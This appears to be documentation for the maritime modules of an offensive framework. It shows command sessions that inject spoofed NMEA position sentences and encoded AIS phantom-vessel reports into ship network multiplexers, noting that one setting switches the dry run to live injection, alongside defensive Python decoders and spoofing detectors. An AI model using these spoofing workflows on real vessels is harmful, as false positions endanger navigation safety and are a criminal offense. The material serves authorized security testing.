Maritime Security
Legal Warning: AIS and NMEA spoofing at sea is illegal under SOLAS and maritime law in all jurisdictions. It creates navigation safety hazards and is a criminal offense under IMO regulations. Use only in authorized lab environments, closed RF chambers, or in authorized maritime security assessments with explicit written permission from vessel owners and port authorities.
| Module | Description |
|---|---|
| `nmea_spoof` | NMEA 0183 GPS/navigation sentence injection (TCP multiplexer) |
| `ais_spoof` | AIS vessel position report spoofing with Type 1 bit encoding |
NMEA 0183 is the standard serial protocol for marine navigation instruments. It carries GPS position, heading, speed, depth, wind, and other sensor data between chart plotters, autopilots, VHF radios, and AIS transponders.
Most NMEA multiplexers (SeaTalk, NMEA 2000 gateways, SignalK servers) accept TCP connections on port 10110 without authentication. An attacker with network access to the ship's LAN or WiFi can inject arbitrary NMEA sentences.
```
$GPGGA,hhmmss.ss,LLLL.LL,a,YYYYY.YY,a,x,xx,x.x,x.x,M,x.x,M,x.x,xxxx*hh<CR><LF>
```

- `$GP` = GPS source prefix
- `GGA` = Global Positioning System Fix Data
- Fields: time, latitude, N/S, longitude, E/W, fix quality, satellites, HDOP, altitude...
- `*hh` = NMEA checksum (XOR of all bytes between `$` and `*`)
```
wxf > use generic/maritime/nmea_spoof
wxf (NMEASpoof) > show options
Options:
TARGET_HOST 127.0.0.1 TCP host for NMEA multiplexer
TARGET_PORT 10110 TCP port for NMEA multiplexer
LAT 0.000000 Spoofed latitude (decimal degrees, N positive)
LON 0.000000 Spoofed longitude (decimal degrees, E positive)
SPEED_KN 0.0 Spoofed speed over ground in knots
HEADING 0.0 Spoofed true heading in degrees
DEPTH_M 10.0 Spoofed water depth in meters
RATE_HZ 1 Sentences per second
SIMULATE true Dry-run, show sentences without sending
wxf (NMEASpoof) > set TARGET_HOST 192.168.1.100
wxf (NMEASpoof) > set TARGET_PORT 10110
wxf (NMEASpoof) > set LAT 1.264
wxf (NMEASpoof) > set LON 103.826
wxf (NMEASpoof) > set SPEED_KN 0.0
wxf (NMEASpoof) > set SIMULATE true
wxf (NMEASpoof) > run
[SIMULATE] NMEA sentences to inject at 1 Hz:
[SIMULATE] $GPGGA,083000.00,0115.840,N,10349.560,E,1,08,1.0,10.0,M,0.0,M,,*49
GGA: pos=(1.264N, 103.826E) alt=10m fix=GPS sats=8
[SIMULATE] $GPGLL,0115.840,N,10349.560,E,083000.00,A,A*6E
GLL: lat/lon confirmed active
[SIMULATE] $GPVTG,0.0,T,0.0,M,0.0,N,0.0,K,A*23
VTG: speed=0.0kn heading=0.0
[SIMULATE] $GPRMC,083000.00,A,0115.840,N,10349.560,E,0.0,0.0,080626,0.0,E,A*37
RMC: recommended minimum data
[SIMULATE] $SDDPT,10.0,0.0*53
DPT: depth=10.0m offset=0.0m
[!] Set SIMULATE=false to inject live into TCP:192.168.1.100:10110
[!] PREREQ: Network access to ship NMEA multiplexer (WiFi, Ethernet, or serial gateway)
```
AIS (Automatic Identification System) is a VHF radio broadcast system used by vessels to announce position, identity, speed, and heading to other ships and shore stations. It operates on VHF channels 87B (161.975 MHz) and 88B (162.025 MHz).
| Type | Description | Notes |
|---|---|---|
| 1 | Class A Position Report | Large vessels, required by SOLAS |
| 2 | Class A Position Report (assigned) | Similar to Type 1 |
| 3 | Class A Position Report (response) | Similar to Type 1 |
| 4 | Base Station Report | Shore-based AIS |
| 5 | Static and Voyage Data | Ship name, destination, ETA |
| 14 | Safety Related Broadcast | Free-text safety message |
| 18 | Class B Position Report | Smaller vessels |
| 21 | Aid-to-Navigation Report | Lighthouses, buoys |
```
wxf > use generic/maritime/ais_spoof
wxf (AISSpoofAttack) > show options
Options:
TARGET_HOST 127.0.0.1 AIS multiplexer TCP host
TARGET_PORT 10110 AIS multiplexer TCP port
MMSI 123456789 Maritime Mobile Service Identity (9 digits)
VESSEL_NAME PHANTOM Vessel name (max 20 chars, uppercase)
LAT 0.000000 Position latitude (decimal degrees)
LON 0.000000 Position longitude (decimal degrees)
SPEED_KN 0.0 Speed over ground in knots (0.1 resolution)
COURSE 0.0 Course over ground in degrees
HEADING 511 True heading (511 = not available)
NAV_STATUS 0 Navigation status (0=underway, 1=at anchor, 5=moored)
MSG_TYPE 1 AIS message type (1/2/3 = Class A position)
RATE_HZ 0.33 Transmission rate (AIS default: 1/3 Hz)
SIMULATE true Dry-run, show encoded sentence without sending
wxf (AISSpoofAttack) > set TARGET_HOST 192.168.1.100
wxf (AISSpoofAttack) > set TARGET_PORT 10110
wxf (AISSpoofAttack) > set MMSI 123456789
wxf (AISSpoofAttack) > set VESSEL_NAME PHANTOM
wxf (AISSpoofAttack) > set LAT 1.264
wxf (AISSpoofAttack) > set LON 103.826
wxf (AISSpoofAttack) > set SPEED_KN 12.0
wxf (AISSpoofAttack) > set COURSE 90.0
wxf (AISSpoofAttack) > set SIMULATE true
wxf (AISSpoofAttack) > run
[SIMULATE] AIS Type 1 (Class A Position Report)
[SIMULATE] MMSI: 123456789
[SIMULATE] Vessel: PHANTOM
[SIMULATE] Position: 1.264000N / 103.826000E
[SIMULATE] Speed: 12.0 kn | Course: 90.0 deg | Heading: N/A
[SIMULATE] Nav: 0 (underway using engine)
[SIMULATE] AIS bit encoding (168 bits):
[SIMULATE] msg_type=1 repeat=0 mmsi=123456789 status=0
[SIMULATE] rot=128 sog=120 accuracy=0 lon=10382600 lat=126400
[SIMULATE] cog=900 hdg=511 timestamp=60 maneuver=0 spare=0 raim=0 radio=0
[SIMULATE] NMEA sentence:
[SIMULATE] !AIVDM,1,1,,A,15NNhV0P00G?Uf6E4lFh23oP0000,0*5B
[SIMULATE] VDM: VHF Data-link Message (received from vessel)
[!] Set SIMULATE=false to inject into TCP:192.168.1.100:10110
[!] AIS spoofing is a maritime criminal offense under IMO and SOLAS
[!] PREREQ: Network access to ship AIS multiplexer (OpenCPN, deckman, etc.)
[!] NOTE: RF transmission requires SDR + VHF antenna - not implemented here
```
Creates a phantom vessel on AIS that appears to other ships and shore radar. Can be used to test vessel traffic service (VTS) responses and AIS receiver validation.
```
wxf > use generic/maritime/ais_spoof
wxf (AISSpoofAttack) > set VESSEL_NAME GHOST_SHIP_TEST
wxf (AISSpoofAttack) > set MMSI 999000001
wxf (AISSpoofAttack) > set LAT -23.9617
wxf (AISSpoofAttack) > set LON -46.3333
wxf (AISSpoofAttack) > set SPEED_KN 5.0
wxf (AISSpoofAttack) > set COURSE 180.0
wxf (AISSpoofAttack) > set NAV_STATUS 0
wxf (AISSpoofAttack) > set SIMULATE true
wxf (AISSpoofAttack) > run
```
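
The receiver-validation side of the phantom-vessel scenario, as an added example that is not part of WXF: it decodes a Type 1/2/3 payload and applies plausibility checks a VTS console or chart plotter could run before plotting a target. The function names, the 60 nm range limit and the 3 kn threshold are assumptions, and the sample is a widely published AIVDM test sentence, not output from this page.

```python
import math

def payload_bits(payload: str) -> str:
    """Undo AIVDM 6-bit armoring: every payload character carries six bits."""
    out = []
    for c in map(ord, payload):
        if not (48 <= c <= 87 or 96 <= c <= 119):
            raise ValueError(f"illegal payload character {chr(c)!r}")
        out.append(f"{c - 56 if c >= 96 else c - 48:06b}")
    return "".join(out)

def _uint(bits: str, start: int, length: int) -> int:
    return int(bits[start:start + length], 2)

def _sint(bits: str, start: int, length: int) -> int:
    v = _uint(bits, start, length)
    return v - (1 << length) if v >> (length - 1) else v  # two's complement

def decode_position_report(sentence: str) -> dict:
    """Decode a single-fragment Type 1/2/3 report from an !AIVDM sentence."""
    bits = payload_bits(sentence.split(",")[5])
    if len(bits) < 168 or _uint(bits, 0, 6) not in (1, 2, 3):
        raise ValueError("not a Class A position report")
    return {
        "mmsi": _uint(bits, 8, 30),
        "status": _uint(bits, 38, 4),
        "sog_kn": _uint(bits, 50, 10) / 10.0,
        "lon": _sint(bits, 61, 28) / 600000.0,   # 1/10000 minute units
        "lat": _sint(bits, 89, 27) / 600000.0,
        "cog": _uint(bits, 116, 12) / 10.0,
        "heading": _uint(bits, 128, 9),          # 511 = not available
    }

def distrust_reasons(r: dict, own_lat: float, own_lon: float, max_range_nm: float = 60.0) -> list:
    """Receiver-side plausibility checks; the thresholds are assumptions."""
    reasons = []
    if not 200_000_000 <= r["mmsi"] <= 799_999_999:
        reasons.append("MMSI is not a ship-station number (first digit 2-7)")
    if r["status"] in (1, 5) and r["sog_kn"] > 3.0:
        reasons.append("reported at anchor or moored but moving")
    dy = (r["lat"] - own_lat) * 60.0
    dx = (r["lon"] - own_lon) * 60.0 * math.cos(math.radians(own_lat))
    if math.hypot(dx, dy) > max_range_nm:
        reasons.append("position beyond plausible VHF reception range")
    return reasons

# Widely published AIVDM test sentence (not from this page): MMSI 477553000, moored.
SAMPLE = "!AIVDM,1,1,,B,177KQJ5000G?tO`K>RA1wUbN0TKH,0*5C"
```

Both MMSI values used on this page (123456789 and 999000001) fail the ship-station range check, which is why a receiver that validates MMSI structure filters the simplest phantom targets.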
Inject a position via NMEA that differs from the vessel's actual GPS position to test chart plotter failover and cross-validation between sensors.
```
wxf > use generic/maritime/nmea_spoof
wxf (NMEASpoof) > set LAT -23.9617
wxf (NMEASpoof) > set LON -46.3333
wxf (NMEASpoof) > set SIMULATE true
wxf (NMEASpoof) > run
```
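
The detection side of the `*hh` checksum and the cross-validation test described above, as an added example (not WXF code): it verifies the checksum and then rejects fixes that imply an impossible speed, showing that a sentence with a valid checksum can still fail a kinematic check. The function names, the 40 kn limit and the sample sentences are constructed for illustration.

```python
import math
from functools import reduce

def nmea_checksum(body: str) -> str:
    """XOR of every byte between '$' and '*', as two uppercase hex digits."""
    return f"{reduce(lambda a, b: a ^ b, body.encode('ascii'), 0):02X}"

def _degrees(value: str, hemi: str, deg_digits: int) -> float:
    """Convert ddmm.mmm (or dddmm.mmm) plus hemisphere to signed degrees."""
    dec = int(value[:deg_digits]) + float(value[deg_digits:]) / 60.0
    return -dec if hemi in ("S", "W") else dec

def parse_gga(sentence: str):
    """Return (seconds_of_day, lat, lon), or None if the sentence is rejected."""
    try:
        body, _, given = sentence.strip().lstrip("$").partition("*")
        f = body.split(",")
        if given.upper() != nmea_checksum(body) or f[0][2:] != "GGA" or not all(f[1:6]):
            return None
        secs = int(f[1][:2]) * 3600 + int(f[1][2:4]) * 60 + float(f[1][4:])
        return secs, _degrees(f[2], f[3], 2), _degrees(f[4], f[5], 3)
    except (ValueError, IndexError):
        return None  # malformed fields are treated like a failed checksum

def speed_kn(a, b) -> float:
    """Speed in knots implied by two (secs, lat, lon) fixes (haversine distance)."""
    p1, l1, p2, l2 = map(math.radians, (a[1], a[2], b[1], b[2]))
    h = math.sin((p2 - p1) / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin((l2 - l1) / 2) ** 2
    nm = 2 * 3440.065 * math.asin(math.sqrt(h))  # Earth radius in nautical miles
    return nm / ((b[0] - a[0]) / 3600.0)

def audit(sentences, max_knots=40.0):
    """Return (index, reason) for fixes with a bad checksum or impossible speed."""
    alerts, last = [], None
    for n, s in enumerate(sentences):
        fix = parse_gga(s)
        if fix is None:
            alerts.append((n, "bad checksum, no fix, or not GGA"))
        elif last and fix[0] > last[0] and speed_kn(last, fix) > max_knots:
            alerts.append((n, "position jump implies impossible speed"))
        else:
            last = fix  # only trusted fixes become the reference
    return alerts

# Constructed stream: two consistent fixes, then a distant fix with a VALID checksum.
SAMPLE = [f"${b}*{nmea_checksum(b)}" for b in (
    "GPGGA,083000.00,0115.840,N,10349.560,E,1,08,1.0,10.0,M,0.0,M,,",
    "GPGGA,083001.00,0115.842,N,10349.562,E,1,08,1.0,10.0,M,0.0,M,,",
    "GPGGA,083002.00,2357.702,S,04620.000,W,1,08,1.0,10.0,M,0.0,M,,")]
SAMPLE.append(SAMPLE[1].replace("083001", "083004"))  # altered after checksumming
```

The checksum only catches corruption in transit; the third sample passes it and is caught solely by the speed check against the last trusted fix.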
```bash
# Install SignalK
npm install -g @signalk/server
# Start with NMEA TCP input on port 10110
signalk-server --listen 10110 --port 3000
# WXF can now inject into localhost:10110
```

OpenCPN is a free chart plotter. Configure a network data connection (TCP client, port 10110) to receive injected NMEA/AIS sentences in real time.
Related pages: Drone Security | Sub-GHz Attacks | Evidence & Forensics
Author: Andre Henrique (@mrhenrike) | Uniao Geek